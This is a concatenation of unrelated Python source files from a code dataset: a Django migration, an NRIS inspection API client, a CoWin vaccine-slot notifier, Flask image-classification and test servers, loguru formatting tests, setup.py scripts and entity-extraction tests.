    # Run the task.
    try:
        rnlincor.run(input, output, **opt)
    except ValueError as e:
        print("ValueError: ", str(e))
    except KeyError as e:
        print("KeyError: ", str(e))
# Setup rnlincor as an IRAF task here
# by setting up an absolute path to the parfile...
# NOTE(review): PkgName/PkgBinary are not defined in this file — they appear
# to be injected into the namespace by the IRAF package loader; confirm.
parfile = iraf.osfn(_parfile)
pyd = iraf.IrafTaskFactory(taskname=_taskname, value=parfile, pkgname=PkgName,
                           pkgbinary=PkgBinary, function=rnlincor_iraf)
| StarcoderdataPython |
1757781 | # Generated by Django 3.2 on 2021-05-23 18:38
import autoslug.fields
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (see the "Generated by" header above);
    # creates the CustomerProfile table keyed one-to-one to accounts.User.
    # Avoid hand-editing — create a follow-up migration instead.

    initial = True

    dependencies = [
        ('accounts', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='CustomerProfile',
            fields=[
                ('created_date', models.DateTimeField(auto_now_add=True)),
                ('modified_date', models.DateTimeField(auto_now=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='accounts.user')),
                ('profile_name', models.CharField(blank=True, max_length=50, null=True, unique=True)),
                ('photo', models.FileField(blank=True, null=True, upload_to='')),
                ('video', models.FileField(blank=True, null=True, upload_to='')),
                ('description', models.TextField(blank=True, null=True)),
                ('dob', models.DateTimeField(verbose_name='Date of birth')),
                ('phone_no', models.IntegerField(verbose_name='Phone number')),
                ('slug', autoslug.fields.AutoSlugField(unique=True)),
                ('current_address', models.TextField(blank=True, null=True)),
                ('permanent_address', models.TextField(blank=True, null=True)),
                ('city', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.city')),
                ('country', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.country')),
                ('post_code', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.postcode')),
                ('state', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.state')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| StarcoderdataPython |
44803 | <gh_stars>0
import random
from src import utils
class PlayerClass:
    """Randomly-assembled D&D-style character class.

    Built from a class definition dict (`class_data`) plus an item catalog
    (`all_items`); rolls a subclass, equipment and features on construction.
    """

    def __init__(
        self, st_checkboxes: dict, all_items: dict, class_name: str, class_data: dict
    ):
        # st_checkboxes maps a saving-throw name to its character-sheet field.
        self.all_items = all_items
        self.st_checkboxes = st_checkboxes
        self.class_name = class_name
        print("Class: " + self.class_name)
        self.level = 1
        self.proficiency_bonus = 2
        self.hit_dice = class_data["hd"]
        self.min_max_stats = class_data["min_max_stats"]
        self.ac = class_data["AC"]
        self.proficiencies = class_data["prof"]
        self.saves = class_data["saves"]
        self.skill_number = class_data["skill number"]
        self.skills = class_data["skills"]
        self.equipment = self.select_item_option(class_data["equipment"])
        self.weapons, self.armors = self.get_weapon_armor_dicts()
        # Pick a random subclass when the class defines any.
        self.subclass = (
            random.choice(list(class_data["subclass"]))
            if class_data["subclass"]
            else ""
        )
        self.languages = class_data["languages"]
        # NOTE: mutates class_data["features"] in place (see get_features).
        self.get_features(class_data)
        self.features = class_data["features"]

    def to_dict(self):
        """Return the character-sheet fields for class, HD and save proficiencies."""
        ...

    def class_to_dict(self):
        data = {
            "ClassLevel": f"{self.class_name} {self.subclass} {str(self.level)}",
            "HD": "1d" + str(self.hit_dice),
            "HDTotal": str(self.level),
        }
        # Tick the checkbox for each proficient saving throw.
        for st in self.saves:
            data[self.st_checkboxes[st]] = "Yes"
        return data

    def get_features(self, class_data: dict):
        """Apply class/subclass-specific feature tweaks (mutates class_data)."""
        if self.class_name == "Fighter":
            # Replace the generic "fighting style" entry with one rolled style.
            style = random.choice(
                list(class_data["features"]["fighting style"].items())
            )
            class_data["features"].pop("fighting style")
            class_data["features"].update({"Fighting Style: " + style[0]: style[1]})
        elif self.subclass == "Draconic Bloodline":
            # Draconic sorcerers override AC and gain extra languages + a type.
            self.ac = class_data["subclass"][self.subclass]["AC"]
            self.languages = (
                self.languages + class_data["subclass"][self.subclass]["languages"]
            )
            draconic_type = random.choice(class_data["subclass"][self.subclass]["type"])
            class_data["features"].update({"Draconic Type": draconic_type})
        if self.subclass:
            class_data["features"].update(
                class_data["subclass"][self.subclass]["features"]
            )

    def select_item_option(self, equipment: list) -> list:
        """Resolve equipment templates ("simple", "martial", ...) to concrete items."""
        final_list = []
        for item in equipment:
            # split_on_slash presumably picks one alternative from "a/b" — confirm.
            item = utils.split_on_slash(item)
            item = item.replace("artisan", random.choice(self.all_items["artisan"]))
            # NOTE(review): "instrument" is replaced from the "artisan" pool —
            # looks like a copy/paste bug; confirm whether an "instrument"
            # item list was intended.
            item = item.replace("instrument", random.choice(self.all_items["artisan"]))
            # "simple melee"/"martial melee" must resolve before the bare
            # "simple"/"martial" replacements below, or the prefixes would
            # be consumed first.
            while "simple melee" in item:
                simple_weapon_choice = random.choice(
                    list(self.all_items["weapon"]["simple"].items())
                )
                if (
                    self.all_items["weapon"]["simple"][simple_weapon_choice[0]]["melee"]
                    == "yes"
                ):
                    item = item.replace("simple melee", simple_weapon_choice[0], 1)
            while "martial melee" in item:
                martial_weapon_choice = random.choice(
                    list(self.all_items["weapon"]["martial"].items())
                )
                if (
                    self.all_items["weapon"]["martial"][martial_weapon_choice[0]][
                        "melee"
                    ]
                    == "yes"
                ):
                    item = item.replace("martial melee", martial_weapon_choice[0], 1)
            while "simple" in item:
                item = item.replace(
                    "simple", random.choice(list(self.all_items["weapon"]["simple"])), 1
                )
            while "martial" in item:
                item = item.replace(
                    "martial",
                    random.choice(list(self.all_items["weapon"]["martial"])),
                    1,
                )
            final_item = item.split(", ")
            final_list = final_list + final_item
        return final_list

    def get_weapon_armor_dicts(self):
        """Look up the stat dicts for every owned weapon and armor item."""
        weapons = []
        armors = []
        for item in self.equipment:
            if item[-1] == ")":
                # Strips a trailing quantity suffix — assumes the form
                # "name (NN)" with a fixed 4-character tail; confirm.
                item = item[: len(item) - 4]
            if item in self.all_items["weapon"]["simple"]:
                weapon = self.all_items["weapon"]["simple"][item]
                weapon["name"] = item
                weapons.append(weapon)
            elif item in self.all_items["weapon"]["martial"]:
                weapon = self.all_items["weapon"]["martial"][item]
                weapon["name"] = item
                weapons.append(weapon)
            if item in self.all_items["armor"]:
                armors.append(self.all_items["armor"][item])
        return weapons, armors
3300323 | import decimal
import uuid
import requests
import json
import functools
from dateutil.relativedelta import relativedelta
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from app.extensions import cache
from ..constants import NRIS_CACHE_PREFIX, TIMEOUT_24_HOURS, TIMEOUT_12_HOURS
def _get_datetime_from_NRIS_data(date):
return datetime.strptime(date, '%Y-%m-%d %H:%M')
def _get_NRIS_token():
    """Return a cached NRIS OAuth access token, fetching a fresh one on miss.

    The token is cached for 12 hours under NRIS_CACHE_PREFIX + 'token'.

    :raises TypeError: if NRIS_TOKEN_URL is not configured
    :raises requests.HTTPError: if the token endpoint returns an error status
    """
    result = cache.get(NRIS_CACHE_PREFIX + 'token')
    if result is None:
        params = {
            'disableDeveloperFilter': 'true',
            'grant_type': 'client_credentials',
            'scope': 'NRISWS.*'
        }
        url = current_app.config['NRIS_TOKEN_URL']
        if url is None:
            raise TypeError('Could not load the NRIS URL.')
        resp = requests.get(
            url=url,
            params=params,
            auth=(current_app.config['NRIS_USER_NAME'], current_app.config['NRIS_PASS']))
        # FIX: the original wrapped this call in a bare `try/except: raise`,
        # which is a no-op; HTTP errors now propagate directly.  The dead
        # `else` branch after the raise was also flattened.
        resp.raise_for_status()
        result = resp.json().get('access_token')
        cache.set(NRIS_CACHE_PREFIX + 'token', result, timeout=TIMEOUT_12_HOURS)
    return result
def _get_EMPR_data_from_NRIS(mine_no):
    """Fetch all EMPR inspection records for a mine from NRIS.

    Queries inspections from 2018-01-01 (the earliest data NRIS holds)
    up to today.

    :param mine_no: mine number to query
    :return: parsed JSON response, or None when no auth token was obtained
    :raises TypeError: if NRIS_INSPECTION_URL is not configured
    :raises requests.HTTPError: on a non-2xx response
    """
    current_date = datetime.now()
    # FIX: the original wrapped _get_NRIS_token() and the requests.get call in
    # `try/except: raise` blocks that re-raised unchanged — pure no-ops, removed.
    token = _get_NRIS_token()
    if token is None:
        return None
    url = current_app.config['NRIS_INSPECTION_URL']
    if url is None:
        raise TypeError('Could not load the NRIS URL.')
    # Inspection start date is set to 2018-01-01 as that is the beginning of time for NRIS
    params = {
        'inspectionStartDate': '2018-01-01',
        'inspectionEndDate': f'{current_date.year}-{current_date.month}-{current_date.day}',
        'mineNumber': mine_no,
    }
    headers = {'Authorization': 'Bearer ' + token}
    # FIX: use the validated `url` — the original re-read the config here,
    # so the None-check above never actually guarded this call.
    empr_nris_resp = requests.get(url=url, params=params, headers=headers)
    # TODO add logging for this error.
    empr_nris_resp.raise_for_status()
    return empr_nris_resp.json()
def _process_NRIS_data(data, mine_no):
    """Summarise NRIS assessment reports for one mine and cache the overview.

    :param data: list of NRIS assessment dicts for the mine.
    :param mine_no: mine number; used only as part of the cache key.
    :return: overview dict with open/overdue/section-35 order counts,
        advisory/warning counts for the last year, and the open-order list.
    """
    # Sort newest-first so data[0] is the most recent assessment.
    data = sorted(
        data,
        key=lambda k: datetime.strptime(k.get('assessmentDate'), '%Y-%m-%d %H:%M'),
        reverse=True)
    most_recent = data[0]
    advisories = 0
    warnings = 0
    num_open_orders = 0
    num_overdue_orders = 0
    section_35_orders = 0
    open_orders_list = []
    for report in data:
        report_date = _get_datetime_from_NRIS_data(report.get('assessmentDate'))
        one_year_ago = datetime.now() - relativedelta(years=1)
        # Assessor is formatted 'DOMAIN\user'; keep only the user part.
        prefix, inspector = report.get('assessor').split('\\')
        inspection = report.get('inspection')
        stops = inspection.get('stops')
        # Sequence number used to label open orders within this report.
        order_count = 1
        for stop in stops:
            stop_orders = stop.get('stopOrders')
            stop_advisories = stop.get('stopAdvisories')
            stop_warnings = stop.get('stopWarnings')
            for order in stop_orders:
                if order.get('orderStatus') == 'Open':
                    # The violated section comes from legislation if present,
                    # otherwise from the permit.
                    legislation = order.get('orderLegislations')
                    permit = order.get('orderPermits')
                    section = None
                    if legislation:
                        section = legislation[0].get('section')
                    elif permit:
                        section = permit[0].get('permitSectionNumber')
                    order_to_add = {
                        'order_no': f'{report.get("assessmentId")}-{order_count}',
                        'violation': section,
                        'report_no': report.get('assessmentId'),
                        'inspector': inspector,
                        'due_date': order.get('orderCompletionDate'),
                        'overdue': False,
                    }
                    num_open_orders += 1
                    # An open order whose completion date is in the past is
                    # overdue.
                    if order.get(
                            'orderCompletionDate') is not None and _get_datetime_from_NRIS_data(
                                order.get('orderCompletionDate')) < datetime.now():
                        num_overdue_orders += 1
                        order_to_add['overdue'] = True
                    open_orders_list.append(order_to_add)
                    order_count += 1
                if order.get('orderAuthoritySection') == 'Section 35':
                    section_35_orders += 1
            # Advisories/warnings only counted for reports from the past year.
            if one_year_ago < report_date:
                advisories += len(stop_advisories)
                warnings += len(stop_warnings)
    # NOTE(review): `inspector` is left over from the *last* (oldest) report
    # iterated, while 'last_inspection' comes from the newest (most_recent).
    # Confirm whether most_recent's inspector was intended here.
    overview = {
        'last_inspection': most_recent.get('assessmentDate'),
        'inspector': inspector,
        'num_open_orders': num_open_orders,
        'num_overdue_orders': num_overdue_orders,
        'advisories': advisories,
        'warnings': warnings,
        'section_35_orders': section_35_orders,
        'open_orders': open_orders_list,
    }
    cache.set(NRIS_CACHE_PREFIX + mine_no, overview, timeout=TIMEOUT_24_HOURS)
    return overview
| StarcoderdataPython |
1749679 | <reponame>hirossan4049/Schreen<gh_stars>0
from flask import Flask, render_template, request, redirect, url_for, Response
#from OpenSSL import SSL
#context = SSL.Context(SSL.TLSv1_2_METHOD)
#context.use_certificate("server.crt")
#context.use_privatekey("server.key")
api = Flask(__name__)
@api.route("/")
def index():
    """Root endpoint: return a plain test string."""
    body = "test\n"
    return body
if __name__ == '__main__':
    # Serve over HTTPS on the LAN address; alternative run configurations
    # (different port / pyOpenSSL context) are kept below for reference.
    #api.run(host='192.168.0.103', port=334, ssl_context=('server.crt', 'server.key'), threaded=True, debug=False)
    api.run(host='192.168.0.103', port=443, ssl_context=('server.crt', 'secret.key'), threaded=True, debug=False)
    # api.run(host='192.168.0.103', port=334, ssl_context=context, threaded=True, debug=False)
| StarcoderdataPython |
1601084 | from typing import List, Optional
from datetime import datetime
import time
from plyer import notification
import json
import yaml
from beepy import beep
from cowinapi import CoWinAPI, VaccinationCenter, CoWinTooManyRequests
CoWinAPIObj = CoWinAPI()
# def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
# vaccination_centers = CoWinAPIObj.calendar_by_pin(pincode, CoWinAPI.today())
# if vaccination_centers:
# vaccination_centers = [vc for vc in vaccination_centers if vc.has_available_sessions()]
# return vaccination_centers
def get_available_centers_by_pin(pincode: str) -> List[VaccinationCenter]:
    """Return vaccination centers for *pincode*, or [] if the lookup fails.

    Best-effort wrapper around the CoWin calendar API: any API or parsing
    error is printed and an empty list returned, so the caller's polling
    loop keeps running.
    """
    vaccination_centers: List[VaccinationCenter] = []
    try:
        vaccination_centers = CoWinAPIObj.calendar_by_pin(pincode, CoWinAPI.today())
    except Exception as exc:  # deliberate best-effort: report and carry on
        print(exc)
    return vaccination_centers
def notify(msg):
    """Show a desktop notification titled 'SLOT OPEN' and play an alert beep.

    :param msg: notification body text describing the open slot(s).
    """
    notification.notify(
        title='SLOT OPEN',
        message=msg,
        app_icon=None,
        timeout=50,
    )
    beep(sound=1)
if __name__ == "__main__":
    # defaults
    pincode_list = []
    min_age_limit = 18
    # Read polling configuration (pincodes, age limit, vaccine types).
    with open(r'config.yaml') as file:
        # The FullLoader parameter handles the conversion from YAML
        # scalar values to Python the dictionary format
        documents = yaml.load(file, Loader=yaml.FullLoader)
        for item, doc in documents.items():
            if item == "pincode_list":
                pincode_list = doc
            if item == "min_age_limit":
                min_age_limit = doc
            if item == "vaccine_type":
                vaccine_type_list = doc
    # Poll the CoWin API forever, notifying whenever a matching slot opens.
    while True:
        for pin in pincode_list:
            vaccination_centers = get_available_centers_by_pin(pin)
            if vaccination_centers is not None:
                for vc in vaccination_centers:
                    msg = "{}".format(vc)
                    session_list = vc.get_available_sessions_by_age_limit(min_age_limit)
                    msg2 = ""
                    for s in session_list:
                        # Only sessions of a wanted vaccine with free capacity.
                        if s.vaccine in vaccine_type_list and s.capacity > 0:
                            msg2 += "\ndate:{}\tvaccine:{}\tcapacity:{}".format(s.date, s.vaccine, s.capacity)
                    msg += "{}\n".format(msg2)
                    # Notify only when at least one matching session was found.
                    if msg2 != "":
                        print(msg)
                        notify(msg)
        time.sleep(10)
| StarcoderdataPython |
1764693 | <filename>api/app.py<gh_stars>0
import io
import numpy as np
from tensorflow.keras.applications import ResNet50, imagenet_utils
from tensorflow.keras.preprocessing.image import img_to_array
import flask
from PIL import Image
app = flask.Flask(__name__)
MODEL = ResNet50(weights="imagenet")
def prep_img(image, target):
    """Resize and normalise a PIL image into a ResNet50-ready batch array.

    :param image: PIL image; converted to RGB if it is in another mode.
    :param target: (width, height) tuple to resize to.
    :return: preprocessed array with a leading batch axis of size 1.
    """
    rgb = image if image.mode == "RGB" else image.convert("RGB")
    arr = img_to_array(rgb.resize(target))
    batch = np.expand_dims(arr, axis=0)
    return imagenet_utils.preprocess_input(batch)
@app.route("/predict", methods=["POST"])
def predict():
    """Classify an uploaded image with ResNet50 and return JSON predictions.

    Expects a multipart POST with an 'image' file; responds with
    {"success": bool, "predictions": [{"label", "probability"}, ...]}.
    """
    data = {"success": False}
    if flask.request.method == "POST" and flask.request.files.get("image"):
        raw = flask.request.files["image"].read()
        img = Image.open(io.BytesIO(raw))
        batch = prep_img(img, target=(224, 224))
        decoded = imagenet_utils.decode_predictions(MODEL.predict(batch))
        data["predictions"] = [
            {"label": label, "probability": float(prob)}
            for _, label, prob in decoded[0]
        ]
        data["success"] = True
    return flask.jsonify(data)
if __name__ == "__main__":
    # Bind to all interfaces so the API is reachable from outside a container.
    app.run(debug=True, host="0.0.0.0")
| StarcoderdataPython |
3377689 | <filename>tests/test_plotting_toys.py
import pytest
import alldecays
from alldecays.plotting.toys.toy_util import get_valid_toy_values
def test_get_valid_toy_values(data_set1):
    """get_valid_toy_values must reject fits lacking toys / channel counts."""
    fit = alldecays.Fit(data_set1)
    # Before any toys are thrown, accessing toy values must raise.
    with pytest.raises(AttributeError) as excinfo:
        get_valid_toy_values(fit)
    expected_info = "Plots skipped: Fit passed without throwing toys"
    assert str(excinfo.value)[: len(expected_info)] == expected_info
    fit.fill_toys(n_toys=2)
    get_valid_toy_values(fit)
    # Channel counts were not stored, so requesting them must still raise.
    with pytest.raises(AttributeError) as excinfo:
        get_valid_toy_values(fit, channel_counts_needed=True)
    expected_info = "Plots skipped: _channel_counts not filled"
    assert str(excinfo.value)[: len(expected_info)] == expected_info
    fit.fill_toys(n_toys=2, store_channel_counts=True)
    get_valid_toy_values(fit, channel_counts_needed=True)
| StarcoderdataPython |
34813 | import datetime
import re
import sys
import freezegun
import pytest
from loguru import logger
# Python < 3.6 renders the UTC timezone name as "UTC+00:00" instead of "UTC";
# tests below interpolate this into expected strings.
if sys.version_info < (3, 6):
    UTC_NAME = "UTC+00:00"
else:
    UTC_NAME = "UTC"
# Each row: (loguru/strftime time format, frozen date, (tz name, utc offset
# seconds), expected rendered string).  '!UTC' in a format converts the
# timestamp to UTC before rendering; brackets escape literal text.
@pytest.mark.parametrize(
    "time_format, date, timezone, expected",
    [
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 UTC +0000",
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 UTC +0000",
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 01-02-03 000045 EST -0500",
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 01-02-03 000045 EST -0500",
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 %s" % UTC_NAME,
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 %s" % UTC_NAME,
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z!UTC",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", -18000),
            "2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
        ),
        (
            "YY-M-D H-m-s SSS Z",
            "2005-04-07 09:03:08.002320",
            ("A", 3600),
            "05-4-7 9-3-8 002 +01:00",
        ),
        (
            "Q_DDDD_DDD d_E h_hh A SS ZZ",
            "2000-01-01 14:00:00.9",
            ("B", -1800),
            "1_001_1 5_6 2_02 PM 90 -0030",
        ),
        ("hh A", "2018-01-01 00:01:02.000003", ("UTC", 0), "12 AM"),
        ("hh A", "2018-01-01 12:00:00.0", ("UTC", 0), "12 PM"),
        ("hh A", "2018-01-01 23:00:00.0", ("UTC", 0), "11 PM"),
        ("[YYYY] MM [DD]", "2018-02-03 11:09:00.000002", ("UTC", 0), "YYYY 02 DD"),
        ("[YYYY MM DD]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[2018 01 03]"),
        ("[[YY]]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[YY]"),
        ("[]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[]"),
        ("[HHmmss", "2018-01-03 11:03:04.000002", ("UTC", 0), "[110304"),
        ("HHmmss]", "2018-01-03 11:03:04.000002", ("UTC", 0), "110304]"),
        ("HH:mm:ss!UTC", "2018-01-01 11:30:00.0", ("A", 7200), "09:30:00"),
        ("UTC! HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "UTC! 11:30:00"),
        ("!UTC HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "!UTC 11:30:00"),
        (
            "hh:mm:ss A - Z ZZ !UTC",
            "2018-01-01 12:30:00.0",
            ("A", 5400),
            "11:00:00 AM - +00:00 +0000 ",
        ),
        (
            "YYYY-MM-DD HH:mm:ss[Z]!UTC",
            "2018-01-03 11:03:04.2",
            ("XYZ", -7200),
            "2018-01-03 13:03:04Z",
        ),
        ("HH:mm:ss[!UTC]", "2018-01-01 11:30:00.0", ("A", 7200), "11:30:00!UTC"),
        ("", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T11:09:00.000002+0030"),
        ("!UTC", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T10:39:00.000002+0000"),
    ],
)
def test_formatting(writer, freeze_time, time_format, date, timezone, expected):
    """Each {time:...} format must render the frozen time exactly."""
    with freeze_time(date, timezone):
        logger.add(writer, format="{time:%s}" % time_format)
        logger.debug("X")
        result = writer.read()
        assert result == expected + "\n"
def test_locale_formatting(writer, freeze_time):
    """Month/day-name tokens must match strftime's locale-dependent output."""
    dt = datetime.datetime(2011, 1, 1, 22, 22, 22, 0)
    with freeze_time(dt):
        logger.add(writer, format="{time:MMMM MMM dddd ddd}")
        logger.debug("Test")
        assert writer.read() == dt.strftime("%B %b %A %a\n")
def test_stdout_formatting(freeze_time, capsys):
    """Time tokens must render correctly when the sink is stdout."""
    with freeze_time("2015-12-25 19:13:18", ("A", 5400)):
        logger.add(sys.stdout, format="{time:YYYY [MM] DD HHmmss Z} {message}")
        logger.debug("Y")
    out, err = capsys.readouterr()
    # [MM] is escaped (literal); 5400 s offset renders as +01:30.
    assert out == "2015 MM 25 191318 +01:30 Y\n"
    assert err == ""
def test_file_formatting(freeze_time, tmp_path):
    """Time tokens in a file-sink path must expand when the file is created."""
    with freeze_time("2015-12-25 19:13:18", ("A", -5400)):
        logger.add(tmp_path / "{time:YYYY [MM] DD HHmmss ZZ}.log")
        logger.debug("Z")
    assert list(tmp_path.iterdir()) == [tmp_path / "2015 MM 25 191318 -0130.log"]
def test_missing_struct_time_fields(writer, freeze_time):
    """Formatting must still work when tm_zone is absent from struct_time."""
    with freeze_time("2011-01-02 03:04:05.6", include_tm_zone=False):
        logger.add(writer, format="{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}")
        logger.debug("X")
        result = writer.read()
        # Zone name/offset fall back to the local zone, hence the regex match.
        assert re.fullmatch(r"2011 01 02 03 04 05 600000 [+-]\d{4} .*\n", result)
def test_freezegun_mocking(writer):
    """loguru must honour time frozen via the freezegun library directly."""
    logger.add(writer, format="[{time:YYYY MM DD HH:mm:ss}] {message}")
    with freezegun.freeze_time("2000-01-01 18:00:05"):
        logger.info("Frozen")
    assert writer.read() == "[2000 01 01 18:00:05] Frozen\n"
| StarcoderdataPython |
3384037 | import os
import re
from setuptools import setup
def read(fname):
    """Return the contents of *fname*, resolved relative to this file.

    Uses a context manager so the file handle is closed promptly; the
    original left the handle open until garbage collection.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as fh:
        return fh.read()
def find_version(fname):
    """Extract the ``__version__`` string from the file *fname*.

    :param fname: path of the Python file to scan.
    :return: version string.
    :raises RuntimeError: if no (non-empty) version assignment is found.
    """
    pattern = re.compile(r'__version__ = [\'"]([^\'"]*)[\'"]')
    version = ''
    with open(fname, 'r') as fp:
        for line in fp:
            match = pattern.match(line)
            if match:
                version = match.group(1)
                break
    if not version:
        raise RuntimeError('Cannot find version information')
    return version
# Extract the package version without importing the package itself.
__version__ = find_version(os.path.join("flask_page", "__init__.py"))

setup(
    name='flask_page',
    version=__version__,
    long_description=read('README.md'),
    packages=['flask_page'],
    url='http://github.com/yoophi/flask-page',
    license='MIT License',
    author='<NAME>',
    author_email='<EMAIL>',
    description='Jinja2 static template page route for Flask',
    include_package_data=True,
    zip_safe=False,
    entry_points={
    },
    install_requires=[
        'Flask==0.10.1',
    ],
    classifiers=[
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Software Development :: Libraries :: Python Modules'
    ]
)
| StarcoderdataPython |
158396 | #!/usr/bin/env python3
# coding: utf-8
from setuptools import setup
import subprocess
import os
def pipen(cmd):
    """Run *cmd* with both stdout and stderr captured through pipes.

    (It's a popen, but with pipes.)
    """
    pipes = {"stdout": subprocess.PIPE, "stderr": subprocess.PIPE}
    return subprocess.Popen(cmd, **pipes)
def out_to_str(out):
    """Decode raw process output bytes to stripped UTF-8 text."""
    text = out.decode('utf-8', 'replace')
    return text.strip()
def get_git_tag():
    """Return the most recent git tag, or None if no tag can be described.

    git-describe exits with 128 when there is no tag (or no repo); any other
    non-zero exit is treated as a hard error.
    """
    git = pipen(['git', 'describe', '--abbrev=0'])
    stdout, stderr = git.communicate()
    exitcode = git.wait()
    if exitcode == 128:
        return None
    elif exitcode != 0:
        raise Exception('fail: {}'.format(out_to_str(stderr)))
    else:
        return out_to_str(stdout)
def get_git_describe(tag):
    '''Returns the describe part without the tag.'''
    git = pipen(['git', 'describe', '--always', '--long', '--dirty'])
    stdout, stderr = git.communicate()
    exitcode = git.wait()
    if exitcode != 0:
        raise Exception('fail: {}'.format(out_to_str(stderr)))
    if tag is not None:
        # Strip the leading tag text; the remainder looks like
        # '-<commits>-g<sha>[-dirty]'.
        tagged = out_to_str(stdout)[len(tag):]
        # If we're building directly from the tag we don't
        # need git-describe. In fact, PyPI won't like it
        # as it violates PEP 440. Let's return empty.
        if tagged[:3] == "-0-" and "dirty" not in tagged:
            return ""
        # PEP 440 local version segment, e.g. '+3.gabcdef0'.
        version = "+" + tagged[1:]
    else:
        # No tag at all: describe printed just the short SHA.
        version = "+g" + out_to_str(stdout)
    return version.replace('-', '.')
with open('LICENSE') as f:
    license = f.read()

with open('README.md') as f:
    readme = f.read()

# Execute version.py in an isolated namespace to read VERSION/SHORTNAME
# without importing the package.
version = {}
with open('adfotg/version.py', 'r') as f:
    exec(f.read(), version)

version_string = version['VERSION']
if os.path.exists(".git"):
    # Building from a git checkout: append describe metadata as a PEP 440
    # local version (empty when building exactly at a clean tag).
    version_string += get_git_describe(get_git_tag())

setup(
    name=version['SHORTNAME'],
    version=version_string,
    description='ADF On-The-Go - convert your RPi Zero to Gotek-ready USB disk',
    long_description=readme,
    long_description_content_type='text/markdown',
    author='Robikz',
    author_email='<EMAIL>',
    license=license,
    include_package_data=True,
    packages=['adfotg'],
    url='https://github.com/Zalewa/adfotg',
    python_requires='>=3.5',
    install_requires=[
        'amitools>=0.5,<0.7',
        'Flask',
    ],
    entry_points={
        'console_scripts': ['adfotg=adfotg.cli:main']
    }
)
| StarcoderdataPython |
1744575 | # -*- coding: utf-8 -*-
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import RedirectView
from xisbn_app import views
admin.autodiscover()

# URL routes: an info page, three ISBN-alternates API endpoints, and a root
# redirect to the info page.
urlpatterns = [
    url( r'^admin/', admin.site.urls ),
    url( r'^info/$', views.info, name='info_url' ),
    # Legacy alias kept for callers still using the 'josiah_' prefix; it maps
    # to the same view as the unprefixed route below.
    url( r'^v1/josiah_filtered_alternate_isbns/(?P<isbn_value>.*)/$', views.filtered_alternates, name='josiah_filtered_alternates_url' ),
    url( r'^v1/filtered_alternate_isbns/(?P<isbn_value>.*)/$', views.filtered_alternates, name='filtered_alternates_url' ),
    url( r'^v1/alternate_isbns/(?P<isbn_value>.*)/$', views.alternates, name='alternates_url' ),
    url( r'^$', RedirectView.as_view(pattern_name='info_url') ),
]
| StarcoderdataPython |
4829007 | from entityextractor.aggregate import EntityAggregator
from entityextractor.result import PersonResult
class TestAggregate(object):
    """Tests for EntityAggregator: dedup, weighting, extraction by language."""

    def test_aggregator(self):
        # A lone partial name is not yet a confirmed entity (len stays 0);
        # adding fuller variants collapses them into one entity.
        agg = EntityAggregator()
        agg.add(PersonResult(agg, 'Banana', 0, 12))
        assert len(agg) == 0, agg
        agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
        assert len(agg) == 1, agg
        agg.add(PersonResult(agg, '<NAME>', 0, 12))
        assert len(agg) == 1, agg

    def test_entities(self):
        # Three mentions of the same person merge to weight 3.
        agg = EntityAggregator()
        agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
        agg.add(PersonResult(agg, 'Mr. <NAME>', 0, 12))
        agg.add(PersonResult(agg, '<NAME>', 0, 12))
        for label, category, weight in agg.entities:
            assert label == '<NAME>', label
            # assert category == 'baa', label
            assert weight == 3, weight

    def test_merkel(self):
        agg = EntityAggregator()
        agg.extract('Das ist der Pudel von <NAME>', ['de', 'en'])
        entities = [l for l, c, w in agg.entities]
        assert '<NAME>' in entities, entities

    def test_multi(self):
        # Two mentions of the same label in one text still yield one entity.
        agg = EntityAggregator()
        text = "This is a text about Foo Blubb, a leader in " \
               "this industry. The should not be confused with Foo Blubb, " \
               "a smaller firm."
        agg.extract(text, ['en'])
